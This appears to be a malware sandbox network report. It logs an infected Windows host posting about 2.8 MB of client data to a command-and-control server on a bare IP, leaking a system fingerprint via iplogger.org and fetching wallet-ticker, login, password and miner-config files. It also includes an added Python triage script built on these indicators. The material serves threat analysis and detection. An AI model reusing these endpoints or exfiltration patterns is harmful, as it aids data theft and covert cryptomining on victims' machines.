Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
Accept-Ranges: bytes
Date: Wed, 18 Nov 2020 13:40:55 GMT
X-Served-By: cache-ams21070-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 3, 1
X-Timer: S1605706855.206239,VS0,VE1
Vary: Authorization,Accept-Encoding, Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 51477f7d015767cb2562bc4474ee7a1c88d1208f
Expires: Wed, 18 Nov 2020 13:45:55 GMT
Source-Age: 106
-
Remote address: 109.248.11.161:35253
Request
POST /IRemotePanel HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"
Host: 109.248.11.161:35253
Content-Length: 136
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Nov 2020 13:40:56 GMT
-
Remote address: 109.248.11.161:35253
Request
POST /IRemotePanel HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"
Host: 109.248.11.161:35253
Content-Length: 2832524
Expect: 100-continue
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Nov 2020 13:41:03 GMT
-
Remote address: 109.248.11.161:35253
Request
POST /IRemotePanel HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"
Host: 109.248.11.161:35253
Content-Length: 583867
Expect: 100-continue
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Nov 2020 13:41:03 GMT
-
Remote address: 8.8.8.8:53
Request
api.ip.sb IN A
Response
api.ip.sb IN CNAME api.ip.sb.cdn.cloudflare.net
api.ip.sb.cdn.cloudflare.net IN A 104.26.12.31
api.ip.sb.cdn.cloudflare.net IN A 172.67.75.172
api.ip.sb.cdn.cloudflare.net IN A 104.26.13.31
-
Remote address: 104.26.12.31:443
Request
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Set-Cookie: __cfduid=dc515cde5967682d0c746fe8a8af81c6e1605706857; expires=Fri, 18-Dec-20 13:40:57 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d2f52f80000d8edd3297000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wOIpaFkIOmg6pBnjDW6IEZkYf1pxy7TJ8r%2BTs7DfobsT9npOBZRZ5PDRk22nQQM%2BCdZJ7MC6m0zT8kiIUt42%2B33tc13%2FBxtVH6Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 5f421b318be4d8ed-AMS
-
Remote address: 8.8.8.8:53
Request
checkip.amazonaws.com IN A
Response
checkip.amazonaws.com IN CNAME checkip.check-ip.aws.a2z.com
checkip.check-ip.aws.a2z.com IN CNAME checkip.us-east-1.prod.check-ip.aws.a2z.com
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 52.206.184.85
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 34.200.69.241
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 107.21.162.206
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 18.209.89.50
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 52.20.197.7
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 52.204.109.97
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 23.21.27.29
checkip.us-east-1.prod.check-ip.aws.a2z.com IN A 3.222.126.94
-
Remote address: 8.8.8.8:53
Request
iplogger.org IN A
Response
iplogger.org IN A 88.99.66.31
-
Remote address: 88.99.66.31:443
Request
GET /1B2Cw7 HTTP/1.1
User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 80801)
Host: iplogger.org
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:40:57 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=1t0cj29pni5fg4jvu99a7j1pv4; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 59f4dd9a694e2487eb52fdab974df495f688f056de5f54acf0a5e9c72cca29b9
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
Remote address: 52.206.184.85:80
Request
GET / HTTP/1.1
Host: checkip.amazonaws.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: lighttpd/1.4.53
Content-Length: 13
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request
whois.iana.org IN A
Response
whois.iana.org IN CNAME ianawhois.vip.icann.org
ianawhois.vip.icann.org IN A 192.0.32.59
-
Remote address: 8.8.8.8:53
Request
WHOIS.AFRINIC.NET IN A
Response
WHOIS.AFRINIC.NET IN CNAME whois-public.AFRINIC.NET
whois-public.AFRINIC.NET IN A 196.192.115.21
whois-public.AFRINIC.NET IN A 196.216.2.20
whois-public.AFRINIC.NET IN A 196.216.2.21
-
Remote address: 8.8.8.8:53
Request
www.geoplugin.net IN A
Response
www.geoplugin.net IN CNAME geoplugin.net
geoplugin.net IN A 178.237.33.50
-
Remote address: 178.237.33.50:80
Request
GET /json.gp?ip=154.61.71.51 HTTP/1.1
Host: www.geoplugin.net
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 930
Connection: keep-alive
Server: Apache
Access-Control-Allow-Origin: *
-
Remote address: 8.8.8.8:53
Request
whois.iana.org IN A
Response
whois.iana.org IN CNAME ianawhois.vip.icann.org
ianawhois.vip.icann.org IN A 192.0.32.59
-
Remote address: 8.8.8.8:53
Request
WHOIS.AFRINIC.NET IN A
Response
WHOIS.AFRINIC.NET IN CNAME whois-public.AFRINIC.NET
whois-public.AFRINIC.NET IN A 196.192.115.21
whois-public.AFRINIC.NET IN A 196.216.2.20
whois-public.AFRINIC.NET IN A 196.216.2.21
-
Remote address: 8.8.8.8:53
Request
loders.xyz IN A
Response
loders.xyz IN A 193.109.79.176
-
Remote address: 8.8.8.8:53
Request
dashost2.xyz IN A
Response
dashost2.xyz IN A 194.147.78.109
-
Remote address: 194.147.78.109:80
Request
GET /randomx/STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:15:41 GMT
ETag: "6-5b3fe806f1e18"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address: 194.147.78.109:80
Request
GET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
ETag: "22-5afecb6476e6e"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address: 8.8.8.8:53
Request
wininit.club IN A
Response
wininit.club IN A 109.248.11.138
-
Remote address: 109.248.11.138:80
Request
GET /d/web.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 13 Oct 2020 21:00:53 GMT
ETag: "e-5b193b5dea71b"
Accept-Ranges: bytes
Content-Length: 14
Content-Type: text/html
-
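Added example, not part of the sandbox report: a Python triage pass that applies the indicator patterns visible in the traces above (tool User-Agents such as AutoIt and RDP Wrapper Update, a User-Agent carrying UserName/System/GPU/RAM/CPU fields, SOAP POSTs to a bare IP on a non-standard port, public IP and geolocation lookups, and one host serving BTC/LTC/ETH/ZEC/DOGE-named resources) to request records transcribed from this page. The category names, the three-field and three-ticker thresholds, and the lookup-host list are assumptions of the example, not output of the sandbox.

```python
# Added example: indicator triage over HTTP request records of the kind shown
# in this report. Not part of the sandbox output; the category names, the
# threshold values and the lookup-service list are assumptions of the example.
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent strings that identify a tool rather than a browser (both seen in the report).
TOOL_USER_AGENTS = {"AutoIt", "RDP Wrapper Update"}
# Fields the report's iplogger.org requests carried inside the User-Agent header.
FINGERPRINT_FIELDS = ("UserName:", "System:", "GPU:", "RAM:", "CPU:")
# Public IP / geolocation services contacted in the report (assumed list; extend as needed).
IP_LOOKUP_HOSTS = {"api.ip.sb", "checkip.amazonaws.com", "ip-api.com",
                   "www.geoplugin.net", "iplogger.org"}
# Resource names like /BTC.html, /LTC.html ... as fetched from dashost.club in the report.
COIN_TICKERS = {"btc", "ltc", "eth", "zec", "doge"}


def is_ipv4_literal(host: str) -> bool:
    """True for a dotted-quad host such as 109.248.11.161 (no DNS name involved)."""
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts)


def triage_http(records):
    """Return (category, subject, detail) findings for a list of request dicts.

    Each record has "method" and "url"; "user_agent" and "headers" are optional.
    """
    findings = []
    tickers_by_host = defaultdict(set)
    for rec in records:
        parts = urlsplit(rec["url"])
        host = parts.hostname or ""
        port = parts.port or (443 if parts.scheme == "https" else 80)
        ua = rec.get("user_agent", "")
        headers = rec.get("headers", {})

        if ua in TOOL_USER_AGENTS:
            findings.append(("tool-user-agent", rec["url"], ua))

        # Three or more fingerprint fields in one UA string is treated as deliberate exfil.
        if sum(field in ua for field in FINGERPRINT_FIELDS) >= 3:
            findings.append(("host-fingerprint-in-user-agent", rec["url"], ua))

        # SOAP POST straight to an IP literal on a non-standard port, as with /IRemotePanel.
        if rec["method"] == "POST" and "SOAPAction" in headers \
                and is_ipv4_literal(host) and port not in (80, 443):
            findings.append(("soap-c2-on-ip-literal", rec["url"], headers["SOAPAction"]))

        if host in IP_LOOKUP_HOSTS:
            findings.append(("external-ip-lookup", rec["url"], host))

        # Collect ticker-named resources per host; judged after the loop.
        stem = parts.path.rsplit("/", 1)[-1].split(".")[0].lower()
        if stem in COIN_TICKERS:
            tickers_by_host[host].add(stem)

    for host, tickers in sorted(tickers_by_host.items()):
        if len(tickers) >= 3:
            findings.append(("wallet-ticker-resources", host, ",".join(sorted(tickers))))
    return findings


def count_by_category(findings):
    """Histogram of finding categories, handy for a one-line verdict."""
    counts = defaultdict(int)
    for category, _, _ in findings:
        counts[category] += 1
    return dict(counts)


# Records transcribed from the traces in this report (constructed sample input).
SAMPLE_RECORDS = [
    {"method": "POST", "url": "http://stcubegames.netxi.in/index.php",
     "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"},
    {"method": "GET", "url": "https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini",
     "user_agent": "RDP Wrapper Update"},
    {"method": "GET", "url": "https://iplogger.org/1qW3y7",
     "user_agent": "UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 "
                   "/ RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 26444)"},
    {"method": "POST", "url": "http://109.248.11.161:35253/IRemotePanel",
     "headers": {"SOAPAction": '"http://tempuri.org/IRemotePanel/GetTasks"'}},
    {"method": "GET", "url": "https://api.ip.sb/geoip"},
    {"method": "GET", "url": "http://checkip.amazonaws.com/"},
    {"method": "GET", "url": "http://www.geoplugin.net/json.gp?ip=154.61.71.51"},
    {"method": "GET", "url": "http://dashost.club/LTC.html"},
    {"method": "GET", "url": "http://dashost.club/BTC.html"},
    {"method": "GET", "url": "http://dashost.club/ETH.html"},
    {"method": "GET", "url": "http://dashost.club/ZEC.html"},
    {"method": "GET", "url": "http://dashost.club/DOGE.html"},
    {"method": "GET", "url": "http://dashost2.xyz/LTC.html", "user_agent": "AutoIt"},
    {"method": "GET", "url": "http://wininit.club/d/web.html", "user_agent": "AutoIt"},
]

if __name__ == "__main__":
    for finding in triage_http(SAMPLE_RECORDS):
        print(finding)
```

Run it directly to print the findings for the transcribed records; to use it on your own proxy or sandbox export, build one dict per request with the same keys and pass the list to triage_http. The ticker rule is deliberately judged per host after the loop, so a single /LTC.html fetch does not fire but a host serving several ticker-named files does.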
Network flows (sent, received, packets out, packets in; the destination, URL, protocol and process columns survive only where shown)

1.3kB    407 B     8     7
315 B    591 B     5     2
    GET http://ip-api.com/json -> 200
4.5kB    5.1kB     20    21
849 B    1.2kB     11    7
    GET http://wininit.club/STATUS.html -> 200
    GET http://wininit.club/L.html -> 200
    GET http://wininit.club/P.html -> 200
    GET http://wininit.club/S.html -> 200
891 B    1.2kB     12    7
    GET http://wininit.club/L2.html -> 200
    GET http://wininit.club/L.html -> 200
    GET http://wininit.club/P.html -> 200
    GET http://wininit.club/S.html -> 200
3.1kB    5.1kB     35    19
    GET http://dashost.club/ex20mac/STATUS.html -> 200
    GET http://dashost.club/ex20mac/loaderTOP.html -> 404
    GET http://dashost.club/LTC.html -> 200
    GET http://dashost.club/BTC.html -> 200
    GET http://dashost.club/ETH.html -> 200
    GET http://dashost.club/ZEC.html -> 200
    GET http://dashost.club/DOGE.html -> 200
    GET http://dashost.club/ex20mac/Login.html -> 200
    GET http://dashost.club/ex20mac/Password.html -> 200
    GET http://dashost.club/ex20mac/Server.html -> 200
    GET http://dashost.club/ex20mac/configCPUX.html -> 200
    GET http://dashost.club/LTC.html -> 200
    GET http://dashost.club/BTC.html -> 200
    GET http://dashost.club/ETH.html -> 200
    GET http://dashost.club/ZEC.html -> 200
    GET http://dashost.club/DOGE.html -> 200
1.3kB    1.1kB     26    16
41.3kB   1.3MB     898   897
512 B    39.1kB    11    27
1.3kB    1.1kB     26    16
604 B    45.1kB    13    31
12.2kB   394.1kB   266   265
149.3kB  4.6MB     3117  3113
    POST http://stcubegames.netxi.in/index.php -> 200
    POST http://stcubegames.netxi.in/index.php -> 200
5.1kB    138.3kB   101   97    151.101.0.133:443  https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini  tls, http  RDPWInst.exe
    GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini -> 200
992 B    4.4kB     10    7
    GET https://iplogger.org/1qW3y7 -> 200
5.1kB    138.3kB   101   97    151.101.0.133:443  https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini  tls, http  RDPWInst.exe
    GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini -> 200
438 B    369 B     9     7
3.5MB    19.9kB    2350  449
    POST http://109.248.11.161:35253/IRemotePanel -> 200
    POST http://109.248.11.161:35253/IRemotePanel -> 200
    POST http://109.248.11.161:35253/IRemotePanel -> 200
438 B    329 B     9     6
707 B    4.3kB     8     8
    GET https://api.ip.sb/geoip -> 200
1.0kB    4.4kB     11    7
    GET https://iplogger.org/1B2Cw7 -> 200
301 B    262 B     5     3
    GET http://checkip.amazonaws.com/ -> 200
1.3kB    1.1kB     27    15
244 B    492 B     5     4
604 B    45.1kB    13    31
336 B    2.6kB     7     6
37.7kB   1.2MB     820   819
788 B    778 B     16    12
366 B    1.3kB     6     4
    GET http://www.geoplugin.net/json.gp?ip=154.61.71.51 -> 200
244 B    492 B     5     4
190 B    18.1kB    4     13
336 B    2.6kB     7     6
778 B    692 B     16    10
282 B    24.1kB    6     17
647 B    580 B     4     3
463 B    664 B     6     4
    GET http://dashost2.xyz/randomx/STATUS.html -> 200
    GET http://dashost2.xyz/LTC.html -> 200
277 B    372 B     4     3
    GET http://wininit.club/d/web.html -> 200
-
DNS lookups (sent, received, packets out, packets in, query name -> answers)

68 B  84 B   1  1  rms-server.tektonit.ru -> 185.175.44.167
56 B  72 B   1  1  ip-api.com -> 208.95.112.1
70 B  86 B   1  1  freemail.freehost.com.ua -> 194.0.200.251
58 B  74 B   1  1  wininit.club -> 109.248.11.138
58 B  74 B   1  1  wininit.club -> 109.248.11.138
58 B  74 B   1  1  dashost.club -> 185.212.148.107
66 B  82 B   1  1  stcubegames.netxi.in -> 185.143.145.9
71 B  170 B  1  1  raw.githubusercontent.com -> 151.101.0.133, 151.101.64.133, 151.101.128.133, 151.101.192.133
58 B  74 B   1  1  iplogger.org -> 88.99.66.31
71 B  170 B  1  1  raw.githubusercontent.com -> 151.101.0.133, 151.101.64.133, 151.101.128.133, 151.101.192.133
55 B  145 B  1  1  api.ip.sb -> 104.26.12.31, 172.67.75.172, 104.26.13.31
67 B  271 B  1  1  checkip.amazonaws.com -> 52.206.184.85, 34.200.69.241, 107.21.162.206, 18.209.89.50, 52.20.197.7, 52.204.109.97, 23.21.27.29, 3.222.126.94
58 B  74 B   1  1  iplogger.org -> 88.99.66.31
60 B  110 B  1  1  whois.iana.org -> 192.0.32.59
63 B  138 B  1  1  WHOIS.AFRINIC.NET -> 196.192.115.21, 196.216.2.20, 196.216.2.21
63 B  93 B   1  1  www.geoplugin.net -> 178.237.33.50
60 B  110 B  1  1  whois.iana.org -> 192.0.32.59
63 B  138 B  1  1  WHOIS.AFRINIC.NET -> 196.192.115.21, 196.216.2.20, 196.216.2.21
56 B  72 B   1  1  loders.xyz -> 193.109.79.176
58 B  74 B   1  1  dashost2.xyz -> 194.147.78.109
58 B  74 B   1  1  wininit.club -> 109.248.11.138
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation: 1
Hidden Files and Directories: 3
Modify Existing Service: 3
Registry Run Keys / Startup Folder: 2
Scheduled Task: 1
Winlogon Helper DLL: 1